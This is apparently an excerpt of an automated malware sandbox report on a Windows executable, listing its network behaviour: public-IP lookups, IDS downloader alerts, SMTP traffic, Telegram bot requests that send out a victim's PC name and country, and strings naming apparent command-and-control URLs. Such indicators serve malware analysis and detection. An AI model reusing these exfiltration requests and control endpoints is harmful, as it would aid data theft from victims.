              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2017:58:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
              Source: Joe Sandbox ViewASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49731 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49733 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49729 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49726 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49740 -> 188.114.97.3:443
              Source: global trafficTCP traffic: 192.168.2.8:49725 -> 185.230.214.164:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49727 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2018:08:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2017:58:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 09 Oct 2024 10:13:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 09 Oct 2024 10:13:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
              Source: svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: svchost.exe, 00000004.00000003.1698526604.0000000007B21000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: svchost.exe, 00000004.00000002.3873466739.0000000007B44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872746042.0000000007F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
              Source: svchost.exe, 00000004.00000002.3873466739.0000000007B44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872746042.0000000007F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
              Source: svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
              Source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005901000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872831902.0000000007F27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
